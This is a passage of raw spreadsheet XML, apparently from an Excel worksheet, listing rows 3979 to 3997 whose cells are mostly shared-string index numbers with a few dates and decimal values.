      <c r="R3979" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3979" s="12" t="s">
        <v>25577</v>
      </c>
      <c r="T3979" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3979" s="12" t="s">
        <v>25578</v>
      </c>
      <c r="V3979" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W3979" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3979" s="12">
        <v>1</v>
      </c>
      <c r="Y3979" s="12" t="s">
        <v>25579</v>
      </c>
    </row>
    <row r="3980" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3980" s="12">
        <v>42749</v>
      </c>
      <c r="B3980" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3980" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3980" s="12" t="s">
        <v>31560</v>
      </c>
      <c r="F3980" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3980" s="12" t="s">
        <v>25586</v>
      </c>
      <c r="H3980" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3980" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3980" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3980" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3980" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3980" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3980" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3980" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3980" s="12" t="s">
        <v>25587</v>
      </c>
      <c r="Q3980" s="12">
        <v>3.2</v>
      </c>
      <c r="R3980" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3980" s="12" t="s">
        <v>25588</v>
      </c>
      <c r="T3980" s="12" t="s">
        <v>25589</v>
      </c>
      <c r="U3980" s="12" t="s">
        <v>25590</v>
      </c>
      <c r="V3980" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W3980" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3980" s="12">
        <v>8</v>
      </c>
      <c r="Y3980" s="12" t="s">
        <v>25591</v>
      </c>
    </row>
    <row r="3981" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3981" s="12">
        <v>42775</v>
      </c>
      <c r="B3981" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C3981" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D3981" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E3981" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3981" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G3981" s="12" t="s">
        <v>25592</v>
      </c>
      <c r="H3981" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3981" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3981" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3981" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3981" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3981" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3981" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3981" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3981" s="12" t="s">
        <v>25587</v>
      </c>
      <c r="Q3981" s="12">
        <v>3.2</v>
      </c>
      <c r="R3981" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3981" s="12" t="s">
        <v>25593</v>
      </c>
      <c r="T3981" s="12" t="s">
        <v>25594</v>
      </c>
      <c r="U3981" s="12" t="s">
        <v>25595</v>
      </c>
      <c r="V3981" s="12" t="s">
        <v>2494</v>
      </c>
      <c r="W3981" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3981" s="12">
        <v>18</v>
      </c>
      <c r="Y3981" s="12" t="s">
        <v>25596</v>
      </c>
    </row>
    <row r="3982" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3982" s="12">
        <v>42776</v>
      </c>
      <c r="B3982" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3982" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3982" s="12" t="s">
        <v>31460</v>
      </c>
      <c r="F3982" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3982" s="12" t="s">
        <v>25597</v>
      </c>
      <c r="H3982" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3982" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3982" s="12" t="s">
        <v>283</v>
      </c>
      <c r="K3982" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3982" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3982" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3982" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3982" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3982" s="12" t="s">
        <v>25598</v>
      </c>
      <c r="Q3982" s="12">
        <v>3.3</v>
      </c>
      <c r="R3982" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3982" s="12" t="s">
        <v>25599</v>
      </c>
      <c r="T3982" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3982" s="12" t="s">
        <v>25600</v>
      </c>
      <c r="V3982" s="12" t="s">
        <v>3605</v>
      </c>
      <c r="W3982" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3982" s="12">
        <v>2</v>
      </c>
      <c r="Y3982" s="12" t="s">
        <v>25601</v>
      </c>
    </row>
    <row r="3983" spans="1:25" ht="13.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3983" s="12">
        <v>42809</v>
      </c>
      <c r="B3983" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D3983" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E3983" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3983" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3983" s="12" t="s">
        <v>25602</v>
      </c>
      <c r="H3983" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3983" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3983" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K3983" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3983" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M3983" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N3983" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O3983" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3983" s="12" t="s">
        <v>25603</v>
      </c>
      <c r="Q3983" s="12" t="s">
        <v>28285</v>
      </c>
      <c r="R3983" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3983" s="12" t="s">
        <v>25604</v>
      </c>
      <c r="T3983" s="12" t="s">
        <v>25605</v>
      </c>
      <c r="U3983" s="12" t="s">
        <v>25606</v>
      </c>
      <c r="V3983" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W3983" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3983" s="12">
        <v>1</v>
      </c>
      <c r="Y3983" s="12" t="s">
        <v>25607</v>
      </c>
    </row>
    <row r="3984" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3984" s="12">
        <v>42821</v>
      </c>
      <c r="B3984" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3984" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E3984" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F3984" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3984" s="12" t="s">
        <v>25612</v>
      </c>
      <c r="H3984" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3984" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J3984" s="12" t="s">
        <v>270</v>
      </c>
      <c r="K3984" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3984" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3984" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3984" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3984" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3984" s="12" t="s">
        <v>25613</v>
      </c>
      <c r="Q3984" s="12">
        <v>3.3</v>
      </c>
      <c r="R3984" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3984" s="12" t="s">
        <v>25614</v>
      </c>
      <c r="T3984" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3984" s="12" t="s">
        <v>25615</v>
      </c>
      <c r="V3984" s="12" t="s">
        <v>274</v>
      </c>
      <c r="W3984" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3984" s="12">
        <v>1</v>
      </c>
      <c r="Y3984" s="12" t="s">
        <v>25616</v>
      </c>
    </row>
    <row r="3985" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3985" s="12">
        <v>42823</v>
      </c>
      <c r="B3985" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C3985" s="12" t="s">
        <v>30561</v>
      </c>
      <c r="D3985" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="E3985" s="12" t="s">
        <v>31516</v>
      </c>
      <c r="F3985" s="12" t="s">
        <v>30563</v>
      </c>
      <c r="G3985" s="12" t="s">
        <v>25617</v>
      </c>
      <c r="H3985" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3985" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3985" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K3985" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3985" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3985" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3985" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3985" s="12" t="s">
        <v>25618</v>
      </c>
      <c r="Q3985" s="12">
        <v>3.3</v>
      </c>
      <c r="R3985" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3985" s="12" t="s">
        <v>25619</v>
      </c>
      <c r="T3985" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3985" s="12" t="s">
        <v>25620</v>
      </c>
      <c r="V3985" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W3985" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3985" s="12">
        <v>7</v>
      </c>
      <c r="Y3985" s="12" t="s">
        <v>25621</v>
      </c>
    </row>
    <row r="3986" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3986" s="12">
        <v>42828</v>
      </c>
      <c r="B3986" s="12" t="s">
        <v>31358</v>
      </c>
      <c r="C3986" s="12" t="s">
        <v>31359</v>
      </c>
      <c r="D3986" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3986" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F3986" s="12" t="s">
        <v>31360</v>
      </c>
      <c r="G3986" s="12" t="s">
        <v>25628</v>
      </c>
      <c r="H3986" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3986" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3986" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3986" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3986" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3986" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3986" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3986" s="12" t="s">
        <v>25629</v>
      </c>
      <c r="Q3986" s="12">
        <v>3.2</v>
      </c>
      <c r="R3986" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3986" s="12" t="s">
        <v>25630</v>
      </c>
      <c r="T3986" s="12" t="s">
        <v>25631</v>
      </c>
      <c r="U3986" s="12" t="s">
        <v>25632</v>
      </c>
      <c r="V3986" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W3986" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3986" s="12">
        <v>40</v>
      </c>
      <c r="Y3986" s="12" t="s">
        <v>25633</v>
      </c>
    </row>
    <row r="3987" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3987" s="12">
        <v>42859</v>
      </c>
      <c r="B3987" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3987" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3987" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F3987" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3987" s="12" t="s">
        <v>25645</v>
      </c>
      <c r="H3987" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3987" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J3987" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K3987" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3987" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3987" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3987" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3987" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3987" s="12" t="s">
        <v>25646</v>
      </c>
      <c r="Q3987" s="12">
        <v>3.2</v>
      </c>
      <c r="R3987" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3987" s="12" t="s">
        <v>25647</v>
      </c>
      <c r="T3987" s="12" t="s">
        <v>25648</v>
      </c>
      <c r="U3987" s="12" t="s">
        <v>25514</v>
      </c>
      <c r="V3987" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W3987" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3987" s="12">
        <v>1</v>
      </c>
      <c r="Y3987" s="12" t="s">
        <v>25649</v>
      </c>
    </row>
    <row r="3988" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3988" s="12">
        <v>42861</v>
      </c>
      <c r="B3988" s="12" t="s">
        <v>30117</v>
      </c>
      <c r="D3988" s="12" t="s">
        <v>30118</v>
      </c>
      <c r="E3988" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3988" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G3988" s="12" t="s">
        <v>25650</v>
      </c>
      <c r="H3988" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3988" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3988" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K3988" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3988" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3988" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3988" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3988" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3988" s="12">
        <v>3.2</v>
      </c>
      <c r="R3988" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3988" s="12" t="s">
        <v>25651</v>
      </c>
      <c r="T3988" s="12" t="s">
        <v>25652</v>
      </c>
      <c r="U3988" s="12" t="s">
        <v>25653</v>
      </c>
      <c r="V3988" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W3988" s="12">
        <v>56011</v>
      </c>
      <c r="X3988" s="12">
        <v>36</v>
      </c>
      <c r="Y3988" s="12" t="s">
        <v>25654</v>
      </c>
    </row>
    <row r="3989" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3989" s="12">
        <v>42870</v>
      </c>
      <c r="B3989" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3989" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3989" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3989" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3989" s="12" t="s">
        <v>25659</v>
      </c>
      <c r="H3989" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3989" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3989" s="12" t="s">
        <v>201</v>
      </c>
      <c r="K3989" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3989" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3989" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3989" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3989" s="12">
        <v>3.2</v>
      </c>
      <c r="Q3989" s="12">
        <v>3.2</v>
      </c>
      <c r="R3989" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3989" s="12" t="s">
        <v>25660</v>
      </c>
      <c r="T3989" s="12" t="s">
        <v>25661</v>
      </c>
      <c r="U3989" s="12" t="s">
        <v>25662</v>
      </c>
      <c r="V3989" s="12" t="s">
        <v>28205</v>
      </c>
      <c r="W3989" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3989" s="12">
        <v>9</v>
      </c>
      <c r="Y3989" s="12" t="s">
        <v>25663</v>
      </c>
    </row>
    <row r="3990" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3990" s="12">
        <v>42879</v>
      </c>
      <c r="B3990" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D3990" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3990" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G3990" s="12" t="s">
        <v>25664</v>
      </c>
      <c r="H3990" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3990" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J3990" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3990" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3990" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3990" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3990" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3990" s="12" t="s">
        <v>25665</v>
      </c>
      <c r="Q3990" s="12">
        <v>3</v>
      </c>
      <c r="R3990" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3990" s="12" t="s">
        <v>25666</v>
      </c>
      <c r="T3990" s="12" t="s">
        <v>25667</v>
      </c>
      <c r="U3990" s="12" t="s">
        <v>25668</v>
      </c>
      <c r="V3990" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W3990" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3990" s="12">
        <v>4</v>
      </c>
      <c r="Y3990" s="12" t="s">
        <v>25669</v>
      </c>
    </row>
    <row r="3991" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3991" s="12">
        <v>42883</v>
      </c>
      <c r="B3991" s="12" t="s">
        <v>31148</v>
      </c>
      <c r="D3991" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3991" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="G3991" s="12" t="s">
        <v>25670</v>
      </c>
      <c r="H3991" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3991" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J3991" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K3991" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3991" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3991" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3991" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3991" s="12">
        <v>3.3</v>
      </c>
      <c r="Q3991" s="12">
        <v>3.3</v>
      </c>
      <c r="R3991" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3991" s="12" t="s">
        <v>25671</v>
      </c>
      <c r="T3991" s="12" t="s">
        <v>25672</v>
      </c>
      <c r="U3991" s="12" t="s">
        <v>25634</v>
      </c>
      <c r="V3991" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W3991" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3991" s="12">
        <v>10</v>
      </c>
      <c r="Y3991" s="12" t="s">
        <v>25673</v>
      </c>
    </row>
    <row r="3992" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3992" s="12">
        <v>42887</v>
      </c>
      <c r="B3992" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3992" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3992" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3992" s="12" t="s">
        <v>31146</v>
      </c>
      <c r="G3992" s="12" t="s">
        <v>25674</v>
      </c>
      <c r="H3992" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3992" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3992" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3992" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3992" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3992" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3992" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3992" s="12">
        <v>3.3</v>
      </c>
      <c r="Q3992" s="12">
        <v>3.3</v>
      </c>
      <c r="R3992" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3992" s="12" t="s">
        <v>25675</v>
      </c>
      <c r="T3992" s="12" t="s">
        <v>25676</v>
      </c>
      <c r="U3992" s="12" t="s">
        <v>25514</v>
      </c>
      <c r="V3992" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3992" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3992" s="12">
        <v>1</v>
      </c>
      <c r="Y3992" s="12" t="s">
        <v>25677</v>
      </c>
    </row>
    <row r="3993" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3993" s="12">
        <v>42890</v>
      </c>
      <c r="B3993" s="12" t="s">
        <v>30816</v>
      </c>
      <c r="D3993" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3993" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3993" s="12" t="s">
        <v>25678</v>
      </c>
      <c r="H3993" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3993" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3993" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3993" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3993" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3993" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3993" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3993" s="12" t="s">
        <v>25656</v>
      </c>
      <c r="Q3993" s="12">
        <v>3.4</v>
      </c>
      <c r="R3993" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3993" s="12" t="s">
        <v>25679</v>
      </c>
      <c r="T3993" s="12" t="s">
        <v>25680</v>
      </c>
      <c r="U3993" s="12" t="s">
        <v>25681</v>
      </c>
      <c r="V3993" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3993" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3993" s="12">
        <v>8</v>
      </c>
      <c r="Y3993" s="12" t="s">
        <v>25682</v>
      </c>
    </row>
    <row r="3994" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3994" s="12">
        <v>42896</v>
      </c>
      <c r="B3994" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D3994" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E3994" s="12" t="s">
        <v>31481</v>
      </c>
      <c r="F3994" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G3994" s="12" t="s">
        <v>25683</v>
      </c>
      <c r="H3994" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3994" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3994" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3994" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3994" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3994" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3994" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3994" s="12" t="s">
        <v>25684</v>
      </c>
      <c r="Q3994" s="12">
        <v>3.2</v>
      </c>
      <c r="R3994" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3994" s="12" t="s">
        <v>25685</v>
      </c>
      <c r="T3994" s="12" t="s">
        <v>25686</v>
      </c>
      <c r="U3994" s="12" t="s">
        <v>25687</v>
      </c>
      <c r="V3994" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3994" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3994" s="12">
        <v>10</v>
      </c>
      <c r="Y3994" s="12" t="s">
        <v>25688</v>
      </c>
    </row>
    <row r="3995" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3995" s="12">
        <v>42907</v>
      </c>
      <c r="B3995" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C3995" s="12" t="s">
        <v>31029</v>
      </c>
      <c r="D3995" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3995" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3995" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3995" s="12" t="s">
        <v>25689</v>
      </c>
      <c r="H3995" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3995" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3995" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3995" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3995" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3995" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3995" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3995" s="12" t="s">
        <v>25690</v>
      </c>
      <c r="Q3995" s="12">
        <v>3</v>
      </c>
      <c r="R3995" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3995" s="12" t="s">
        <v>25691</v>
      </c>
      <c r="T3995" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3995" s="12" t="s">
        <v>23735</v>
      </c>
      <c r="V3995" s="12" t="s">
        <v>24240</v>
      </c>
      <c r="W3995" s="12">
        <v>43107</v>
      </c>
      <c r="X3995" s="12">
        <v>9</v>
      </c>
      <c r="Y3995" s="12" t="s">
        <v>25692</v>
      </c>
    </row>
    <row r="3996" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3996" s="12">
        <v>42918</v>
      </c>
      <c r="B3996" s="12" t="s">
        <v>29839</v>
      </c>
      <c r="C3996" s="12" t="s">
        <v>29858</v>
      </c>
      <c r="D3996" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3996" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3996" s="12" t="s">
        <v>29859</v>
      </c>
      <c r="G3996" s="12" t="s">
        <v>25693</v>
      </c>
      <c r="H3996" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3996" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J3996" s="12" t="s">
        <v>129</v>
      </c>
      <c r="K3996" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3996" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3996" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3996" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3996" s="12" t="s">
        <v>25694</v>
      </c>
      <c r="Q3996" s="12">
        <v>3</v>
      </c>
      <c r="R3996" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3996" s="12" t="s">
        <v>25695</v>
      </c>
      <c r="T3996" s="12" t="s">
        <v>10990</v>
      </c>
      <c r="U3996" s="12" t="s">
        <v>25696</v>
      </c>
      <c r="V3996" s="12" t="s">
        <v>8682</v>
      </c>
      <c r="W3996" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3996" s="12">
        <v>4</v>
      </c>
      <c r="Y3996" s="12" t="s">
        <v>25697</v>
      </c>
    </row>
    <row r="3997" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3997" s="12">
        <v>42957</v>
      </c>
      <c r="B3997" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D3997" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3997" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3997" s="12" t="s">
        <v>25698</v>
      </c>
      <c r="H3997" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3997" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3997" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K3997" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3997" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3997" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3997" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3997" s="12" t="s">
        <v>25699</v>
      </c>
      <c r="Q3997" s="12">
        <v>3</v>
      </c>
      <c r="R3997" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3997" s="12" t="s">
        <v>25700</v>
      </c>
      <c r="T3997" s="12" t="s">
        <v>12894</v>
      </c>
      <c r="U3997" s="12" t="s">
        <v>25701</v>
      </c>
      <c r="V3997" s="12" t="s">
        <v>995</v>
      </c>
